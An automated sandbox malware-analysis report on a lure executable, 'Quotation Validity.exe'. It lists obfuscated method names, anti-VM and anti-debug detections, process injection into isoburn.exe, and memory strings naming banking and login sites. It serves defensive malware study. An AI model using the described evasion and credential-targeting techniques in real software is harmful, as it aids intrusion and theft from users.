                      Source: 2.2.Quotation Validity.exe.5e70000.5.raw.unpack, kAOj1Y7pfP90kycNNw.csHigh entropy of concatenated method names: 'lb2Ia3XrDtd392xi2Tb', 'XJIblTXQXnFqByJBCJm', 'uLEr9lUTy0', 'Y8R45UX8CExDEFrtuqs', 'ye0NJSX7mZWAZIVVpiG', 'WY1PxJXMKygj5Preg16', 'ELG2kXXJWTZduCJNQBl', 'RgtTUJcyZL', 'wUUrNltvEH', 'CJErdEKrT9'
                      Source: 2.2.Quotation Validity.exe.44e7598.4.raw.unpack, kYw2t6Cujk8r0xkKn5A.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'QFc4LHkEsY', 'X0W4h5rrRu', 'R7W4koqfUj', 'feu44ynFoc', 'hac4tKk2LM', 'daZ4mT9FNL', 'DwK4DpbMXZ'
                      Source: 2.2.Quotation Validity.exe.44e7598.4.raw.unpack, h5HxGKUEXWrqmUk5Dl.csHigh entropy of concatenated method names: 'zNZvlgPQfO', 'UCRvyCZZfX', 'U7Ov7pD7Mu', 'rhEvQ6XISq', 'x03vN3Su7F', 'J8dv6mx1dv', 'mRevquXOv8', 'H77vsQrkME', 'bpWv5Ymbel', 'XuQvA825f9'
                      Source: 2.2.Quotation Validity.exe.44e7598.4.raw.unpack, I257RiJPIrWR2xy1FE.csHigh entropy of concatenated method names: 'ToString', 'MLeExCwhif', 'EuWEZe4qLP', 'U4vE8KRHj2', 'SdTEg45lLb', 'LYLEiAs9gc', 'YUYErR0Yat', 'tjrEPx8dfU', 'sycEcRc19E', 'H91EU2gQ79'
                      Source: 2.2.Quotation Validity.exe.44e7598.4.raw.unpack, Od6YwxKt7YrNrBL1cF.csHigh entropy of concatenated method names: 'RjiVjNP2qo', 'RavVpu1P5n', 'tK41F1uMKl', 'yFU1CWbEvA', 'cJQVxMXlBm', 'IobVOFgjVa', 'j3CVSWIuTO', 'y7gVeZr9uV', 'vZ4VBt17qX', 'nSUVJrCrEY'
                      Source: 2.2.Quotation Validity.exe.44e7598.4.raw.unpack, amviEfW6dl31nSNBN7.csHigh entropy of concatenated method names: 'WeT78Was3', 'lZWQBNIoA', 'iwm69PF2v', 'JuRqPgjtO', 'SYO5mseMy', 'nRLAmCEm4', 'WhjrinmLAoNEkgemqe', 'tmOur6YFagY79lsRcx', 'Q0B19wNtX', 'q3ahuIedI'
                      Source: 2.2.Quotation Validity.exe.44e7598.4.raw.unpack, t5MOqWCFf9eOYvjVC8u.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'RVVhxGPv6X', 'L5hhOZvROp', 'FZrhSIhTOB', 'RIXhe8RJtO', 'OYohBZVQXX', 'LoghJiUPqa', 'Vs3haRuO67'
                      Source: 2.2.Quotation Validity.exe.44e7598.4.raw.unpack, L0AQhRXo4qQe2hqTnb.csHigh entropy of concatenated method names: 'PaGofPJ7f2', 'pPXoYV4bkg', 'qNRoGq0Ci4', 'e7jonVI7Yj', 'iC5oMZY7iE', 'hOto3htoaL', 'HR8ovVRQnL', 'uDioX07isj', 'yFwowbIvDV', 'YCioIQI1SJ'
                      Source: 2.2.Quotation Validity.exe.44e7598.4.raw.unpack, YANjrvzfk5eqILVaI9.csHigh entropy of concatenated method names: 'qiKh6GodFu', 'Oplhsgr9Qf', 'QWNh5Cxwe0', 'YS4h22yIN8', 'bjDhZeiKBu', 'HBBhg5hJQA', 'VyshiVqmho', 'yIDhDwCu4u', 'ecQhlTyT2p', 'nk4hyt80aZ'
                      Source: 2.2.Quotation Validity.exe.44e7598.4.raw.unpack, pvnc8JpnNdIMnHG5MX.csHigh entropy of concatenated method names: 'C79hnAqjuM', 'ThuhMFFuDu', 'Ypvh3FLmOh', 'xGshvRZf9i', 'i7fhLoJTKd', 'svwhX64cVa', 'Next', 'Next', 'Next', 'NextBytes'
                      Source: 2.2.Quotation Validity.exe.44e7598.4.raw.unpack, lZXfE1AcaEeNcwwM7x.csHigh entropy of concatenated method names: 'yDfMN8Y8K8', 'FkIMqn3dux', 'idFn8NDaq2', 'tntngXVK8v', 'Hpqni6OZq1', 'JyYnr74Vdj', 'VgOnPCMiAw', 'nRgncvHsGR', 'b12nUT9Yjy', 'KLXnTBTiD8'
                      Source: 2.2.Quotation Validity.exe.44e7598.4.raw.unpack, urntG10VLDyIdTfQDm.csHigh entropy of concatenated method names: 'iTaL2dgatw', 'iIlLZjRrth', 'cLhL8VukWU', 'SFwLgPXMik', 'oOCLiZGFfF', 'pveLrWhtCr', 'FI8LPfEO7C', 'xPZLc3ETH6', 'GpFLUiJHco', 'HlTLTorFVZ'
                      Source: 2.2.Quotation Validity.exe.44e7598.4.raw.unpack, KnnK8XSCKvQEo4K9Uf.csHigh entropy of concatenated method names: 'qmyHsYjqKP', 'T1NH5yjl7X', 'WaZH2wlkxo', 'sgWHZqN6uf', 'DTqHgHoRyS', 'RA5HicLrjL', 'esVHPkJOom', 'DXoHccn0oy', 'XLmHT4KUUy', 'ii1HxQGGVB'
                      Source: 2.2.Quotation Validity.exe.44e7598.4.raw.unpack, N5pa6mbrEKLlhI1c1D.csHigh entropy of concatenated method names: 'JVMLd1ryON', 'qCDLVP57qy', 'v51LLHRwrx', 'jh4Lk9fPZw', 'Sn6LtZXYRK', 'n9wLDyrx7m', 'Dispose', 'oRN1YCCLjh', 'nlh1GSDZjL', 'lYQ1nDalUY'
                      Source: 2.2.Quotation Validity.exe.44e7598.4.raw.unpack, nQxcW3u1CDaQqJLW6T.csHigh entropy of concatenated method names: 'rtGCvaISc3', 'vJkCXRod0a', 'hymCIvFFAB', 'n4DC9jwZXf', 'lwMCd7x3To', 'TGFCElARYK', 'AQgAG07txruFsR6mn8', 'gfRhVbPVT7VDnLVSVy', 'aypCCMfXi0', 'pm8CoR3VLo'
                      Source: 2.2.Quotation Validity.exe.44e7598.4.raw.unpack, iToaGF2lARYKayyNlK.csHigh entropy of concatenated method names: 'BLf3fRLKrY', 'rk33GHQqXB', 'kWp3MpuHyw', 'Kgc3v5G6h1', 'dVs3XVOGDX', 'FyHMRrJ7dK', 'NWpMK3g7ud', 'suFMb8l04w', 'VjWMjrI4aQ', 'G9cM0a8p4x'
                      Source: 2.2.Quotation Validity.exe.44e7598.4.raw.unpack, gaISc3smJkRod0afuE.csHigh entropy of concatenated method names: 'wMqGe8EBRd', 'yalGBqfq3P', 'Fb4GJcP8Pk', 'jEnGaEsk6k', 'JLnGRCNQSi', 'QLBGKVtn2v', 'KfTGbp33eh', 'sWTGj2xd1R', 'M7cG0DTfcZ', 'MX8Gpkre3u'
                      Source: 2.2.Quotation Validity.exe.44e7598.4.raw.unpack, oN2grECCK4gO17L0FAy.csHigh entropy of concatenated method names: 'Rdthp9scwo', 'fc2hzZp0lF', 'VArkFCQrvj', 'Vp4kC5w2si', 'uKOkWYfLZA', 'c6ckoAxE0n', 'cm1ku6YXev', 'ysJkf1oQ3l', 'nsikYLIldq', 'sk1kGZWDep'
                      Source: 2.2.Quotation Validity.exe.44e7598.4.raw.unpack, VoqGq3ajNAWF6jOayP.csHigh entropy of concatenated method names: 'hrDVIyFPjI', 't9VV9UneKS', 'ToString', 'R2GVY7SvWQ', 'FcYVGZjn6E', 'sCRVnSBILr', 'oW6VMwRq0n', 'QPDV3Ptom8', 'GbYVvgFli6', 'IrfVXtFUF7'
                      Source: 2.2.Quotation Validity.exe.44e7598.4.raw.unpack, IfUyg8GCniJR50PisR.csHigh entropy of concatenated method names: 'Dispose', 'ULlC0hI1c1', 'A4pWZMI7ZP', 'tt6ZmUqLQ1', 'wy5Cpf7nZy', 'aMNCzaoUre', 'ProcessDialogKey', 'hTtWFrntG1', 'qLDWCyIdTf', 'ADmWWEvnc8'
                      Source: 2.2.Quotation Validity.exe.44e7598.4.raw.unpack, MNysO1PmBFCOrx1ULk.csHigh entropy of concatenated method names: 'I1XvYVLcQX', 'WBovn5K6wu', 'yAOv3vs632', 'tqf3ptcDhw', 'Hei3zQZvuq', 'PAVvFiFAyE', 'wY7vCh7uq1', 'vUqvWYudPq', 'pwBvobVpSL', 'orgvuul0VI'
                      Source: 2.2.Quotation Validity.exe.44e7598.4.raw.unpack, l8heFM5ymvFFABH4Dj.csHigh entropy of concatenated method names: 'kkLnQ72aow', 'BB0n6bBCUU', 'GU5nsvxkyY', 'bdWn5qD7QV', 'Vhjnd7ddQh', 'VhqnEheWRd', 'oISnVODh8i', 'qByn1JaLCu', 'CHRnLvHqvP', 'LP0nhmuyP1'
                      Source: 2.2.Quotation Validity.exe.44324c8.1.raw.unpack, FZaOUuOPvnEAfIAr0M.csHigh entropy of concatenated method names: 'lEA0fIAr0', 'tZCA8AZk9', 'gXO9bmMm8', 'DGw7NTeNK', 'Om2dkTqQy', 'EZYgaiyMO', 'Dispose', 'FZaOOUuPv', 'pv8tyvFJFxYXZkDera', 'y16QeXgcC0F7yngarN'
                      Source: 2.2.Quotation Validity.exe.44324c8.1.raw.unpack, GtaAIbrHXObmMm8GPA.csHigh entropy of concatenated method names: 't43wlqHDE', 'b331V9lSR', 'y0lQR8D9G', 'PPrmXmJxA', 'CF9acgM2i', 'eykiYV7wh', 'vSMVwpZMk', 'kxKJsuLoh', 'Ny8e5Nb61', 'qdOCMMDun'
                      Source: 2.2.Quotation Validity.exe.44324c8.1.raw.unpack, kAOj1Y7pfP90kycNNw.csHigh entropy of concatenated method names: 'lb2Ia3XrDtd392xi2Tb', 'XJIblTXQXnFqByJBCJm', 'uLEr9lUTy0', 'Y8R45UX8CExDEFrtuqs', 'ye0NJSX7mZWAZIVVpiG', 'WY1PxJXMKygj5Preg16', 'ELG2kXXJWTZduCJNQBl', 'RgtTUJcyZL', 'wUUrNltvEH', 'CJErdEKrT9'
                      Source: C:\Users\user\Desktop\Quotation Validity.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Quotation Validity.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Quotation Validity.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Quotation Validity.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Quotation Validity.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Quotation Validity.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Quotation Validity.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Quotation Validity.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Quotation Validity.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Quotation Validity.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Quotation Validity.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Quotation Validity.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Quotation Validity.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Quotation Validity.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Quotation Validity.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Quotation Validity.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Quotation Validity.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Quotation Validity.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Quotation Validity.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Quotation Validity.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Quotation Validity.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Quotation Validity.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Quotation Validity.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Quotation Validity.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Quotation Validity.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Quotation Validity.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Quotation Validity.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Quotation Validity.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Quotation Validity.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Quotation Validity.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Quotation Validity.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Quotation Validity.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Quotation Validity.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Quotation Validity.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Quotation Validity.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Quotation Validity.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Quotation Validity.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Quotation Validity.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\isoburn.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\isoburn.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\isoburn.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\isoburn.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\isoburn.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Yara detected AntiVM3
                      Source: Yara matchFile source: Process Memory Space: Quotation Validity.exe PID: 7488, type: MEMORYSTR
                      Switches to a custom stack to bypass stack traces
                      Source: C:\Windows\SysWOW64\isoburn.exeAPI/Special instruction interceptor: Address: 7FF8418CD324
                      Source: C:\Windows\SysWOW64\isoburn.exeAPI/Special instruction interceptor: Address: 7FF8418CD7E4
                      Source: C:\Windows\SysWOW64\isoburn.exeAPI/Special instruction interceptor: Address: 7FF8418CD944
                      Source: C:\Windows\SysWOW64\isoburn.exeAPI/Special instruction interceptor: Address: 7FF8418CD504
                      Source: C:\Windows\SysWOW64\isoburn.exeAPI/Special instruction interceptor: Address: 7FF8418CD544
                      Source: C:\Windows\SysWOW64\isoburn.exeAPI/Special instruction interceptor: Address: 7FF8418CD1E4
                      Source: C:\Windows\SysWOW64\isoburn.exeAPI/Special instruction interceptor: Address: 7FF8418D0154
                      Source: C:\Windows\SysWOW64\isoburn.exeAPI/Special instruction interceptor: Address: 7FF8418CDA44
                      Source: C:\Users\user\Desktop\Quotation Validity.exeMemory allocated: 1820000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Quotation Validity.exeMemory allocated: 3410000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Quotation Validity.exeMemory allocated: 3170000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Quotation Validity.exeMemory allocated: 97D0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Quotation Validity.exeMemory allocated: A7D0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Quotation Validity.exeMemory allocated: A9E0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Quotation Validity.exeMemory allocated: B9E0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013ED1C0 rdtsc 9_2_013ED1C0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\isoburn.exeWindow / User API: threadDelayed 1792Jump to behavior
                      Source: C:\Windows\SysWOW64\isoburn.exeWindow / User API: threadDelayed 8181Jump to behavior
                      Source: C:\Users\user\Desktop\Quotation Validity.exeAPI coverage: 0.8 %
                      Source: C:\Windows\SysWOW64\isoburn.exeAPI coverage: 2.9 %
                      Source: C:\Users\user\Desktop\Quotation Validity.exe TID: 7528Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\isoburn.exe TID: 744Thread sleep count: 1792 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\isoburn.exe TID: 744Thread sleep time: -3584000s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\isoburn.exe TID: 744Thread sleep count: 8181 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\isoburn.exe TID: 744Thread sleep time: -16362000s >= -30000sJump to behavior
                      Source: C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe TID: 5968Thread sleep time: -60000s >= -30000sJump to behavior
                      Source: C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe TID: 5968Thread sleep time: -49500s >= -30000sJump to behavior
                      Source: C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe TID: 5968Thread sleep time: -35000s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\isoburn.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\isoburn.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_02A5C4E0 FindFirstFileW,FindNextFileW,FindClose,12_2_02A5C4E0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: l420377x.12.drBinary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
                      Source: l420377x.12.drBinary or memory string: tasks.office.comVMware20,11696501413o
                      Source: l420377x.12.drBinary or memory string: trackpan.utiitsl.comVMware20,11696501413h
                      Source: l420377x.12.drBinary or memory string: netportal.hdfcbank.comVMware20,11696501413
                      Source: l420377x.12.drBinary or memory string: www.interactiveuserers.co.inVMware20,11696501413~
                      Source: l420377x.12.drBinary or memory string: dev.azure.comVMware20,11696501413j
                      Source: l420377x.12.drBinary or memory string: Interactive userers - COM.HKVMware20,11696501413
                      Source: l420377x.12.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696501413
                      Source: l420377x.12.drBinary or memory string: secure.bankofamerica.comVMware20,11696501413|UE
                      Source: l420377x.12.drBinary or memory string: bankofamerica.comVMware20,11696501413x
                      Source: l420377x.12.drBinary or memory string: Canara Transaction PasswordVMware20,11696501413}
                      Source: l420377x.12.drBinary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413
                      Source: isoburn.exe, 0000000C.00000002.3735446726.00000000081F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11
                      Source: l420377x.12.drBinary or memory string: Canara Transaction PasswordVMware20,11696501413x
                      Source: l420377x.12.drBinary or memory string: turbotax.intuit.comVMware20,11696501413t
                      Source: isoburn.exe, 0000000C.00000002.3730207488.0000000003107000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: l420377x.12.drBinary or memory string: Interactive userers - HKVMware20,11696501413]
                      Source: l420377x.12.drBinary or memory string: outlook.office.comVMware20,11696501413s
                      Source: KnETAajUsFuuTQ.exe, 0000000D.00000002.3731959459.00000000009BF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllu
                      Source: l420377x.12.drBinary or memory string: Interactive userers - EU East & CentralVMware20,11696501413
                      Source: isoburn.exe, 0000000C.00000002.3735446726.00000000081F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactiveuserers.comVMware20,1169650x
                      Source: l420377x.12.drBinary or memory string: account.microsoft.com/profileVMware20,11696501413u
                      Source: l420377x.12.drBinary or memory string: Interactive userers - EU WestVMware20,11696501413n
                      Source: l420377x.12.drBinary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
                      Source: isoburn.exe, 0000000C.00000002.3735446726.00000000081F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,1169650141n
                      Source: l420377x.12.drBinary or memory string: ms.portal.azure.comVMware20,11696501413
                      Source: firefox.exe, 00000011.00000002.2005408986.000001E037AAC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllcct
                      Source: l420377x.12.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413
                      Source: l420377x.12.drBinary or memory string: www.interactiveuserers.comVMware20,11696501413}
                      Source: l420377x.12.drBinary or memory string: interactiveuserers.co.inVMware20,11696501413d
                      Source: l420377x.12.drBinary or memory string: microsoft.visualstudio.comVMware20,11696501413x
                      Source: l420377x.12.drBinary or memory string: outlook.office365.comVMware20,11696501413t
                      Source: l420377x.12.drBinary or memory string: global block list test formVMware20,11696501413
                      Source: l420377x.12.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
                      Source: l420377x.12.drBinary or memory string: interactiveuserers.comVMware20,11696501413
                      Source: l420377x.12.drBinary or memory string: discord.comVMware20,11696501413f
                      Source: isoburn.exe, 0000000C.00000002.3735446726.00000000081F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,116965
                      Source: isoburn.exe, 0000000C.00000002.3735446726.00000000081F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696
                      Source: l420377x.12.drBinary or memory string: AMC password management pageVMware20,11696501413
                      Source: C:\Users\user\Desktop\Quotation Validity.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\Quotation Validity.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\SysWOW64\isoburn.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013ED1C0 rdtsc 9_2_013ED1C0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_00417723 LdrLoadDll,9_2_00417723
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0136B136 mov eax, dword ptr fs:[00000030h]9_2_0136B136
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0136B136 mov eax, dword ptr fs:[00000030h]9_2_0136B136
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0136B136 mov eax, dword ptr fs:[00000030h]9_2_0136B136
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0136B136 mov eax, dword ptr fs:[00000030h]9_2_0136B136
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01404144 mov eax, dword ptr fs:[00000030h]9_2_01404144
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01404144 mov eax, dword ptr fs:[00000030h]9_2_01404144
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01404144 mov ecx, dword ptr fs:[00000030h]9_2_01404144
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01404144 mov eax, dword ptr fs:[00000030h]9_2_01404144
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01404144 mov eax, dword ptr fs:[00000030h]9_2_01404144
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01371131 mov eax, dword ptr fs:[00000030h]9_2_01371131
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01371131 mov eax, dword ptr fs:[00000030h]9_2_01371131
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01445152 mov eax, dword ptr fs:[00000030h]9_2_01445152
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01408158 mov eax, dword ptr fs:[00000030h]9_2_01408158
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013A0124 mov eax, dword ptr fs:[00000030h]9_2_013A0124
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01409179 mov eax, dword ptr fs:[00000030h]9_2_01409179
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0136F172 mov eax, dword ptr fs:[00000030h]9_2_0136F172
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0136F172 mov eax, dword ptr fs:[00000030h]9_2_0136F172
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0136F172 mov eax, dword ptr fs:[00000030h]9_2_0136F172
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0136F172 mov eax, dword ptr fs:[00000030h]9_2_0136F172
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0136F172 mov eax, dword ptr fs:[00000030h]9_2_0136F172
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0136F172 mov eax, dword ptr fs:[00000030h]9_2_0136F172
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0136F172 mov eax, dword ptr fs:[00000030h]9_2_0136F172
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0136F172 mov eax, dword ptr fs:[00000030h]9_2_0136F172
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0136F172 mov eax, dword ptr fs:[00000030h]9_2_0136F172
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0136F172 mov eax, dword ptr fs:[00000030h]9_2_0136F172
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0136F172 mov eax, dword ptr fs:[00000030h]9_2_0136F172
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0136F172 mov eax, dword ptr fs:[00000030h]9_2_0136F172
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0136F172 mov eax, dword ptr fs:[00000030h]9_2_0136F172
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0136F172 mov eax, dword ptr fs:[00000030h]9_2_0136F172
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0136F172 mov eax, dword ptr fs:[00000030h]9_2_0136F172
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0136F172 mov eax, dword ptr fs:[00000030h]9_2_0136F172
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0136F172 mov eax, dword ptr fs:[00000030h]9_2_0136F172
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0136F172 mov eax, dword ptr fs:[00000030h]9_2_0136F172
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0136F172 mov eax, dword ptr fs:[00000030h]9_2_0136F172
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0136F172 mov eax, dword ptr fs:[00000030h]9_2_0136F172
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0136F172 mov eax, dword ptr fs:[00000030h]9_2_0136F172
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01430115 mov eax, dword ptr fs:[00000030h]9_2_01430115
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0141A118 mov ecx, dword ptr fs:[00000030h]9_2_0141A118
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0141A118 mov eax, dword ptr fs:[00000030h]9_2_0141A118
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0141A118 mov eax, dword ptr fs:[00000030h]9_2_0141A118
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0141A118 mov eax, dword ptr fs:[00000030h]9_2_0141A118
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0136C156 mov eax, dword ptr fs:[00000030h]9_2_0136C156
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01376154 mov eax, dword ptr fs:[00000030h]9_2_01376154
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01376154 mov eax, dword ptr fs:[00000030h]9_2_01376154
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01377152 mov eax, dword ptr fs:[00000030h]9_2_01377152
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01369148 mov eax, dword ptr fs:[00000030h]9_2_01369148
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01369148 mov eax, dword ptr fs:[00000030h]9_2_01369148
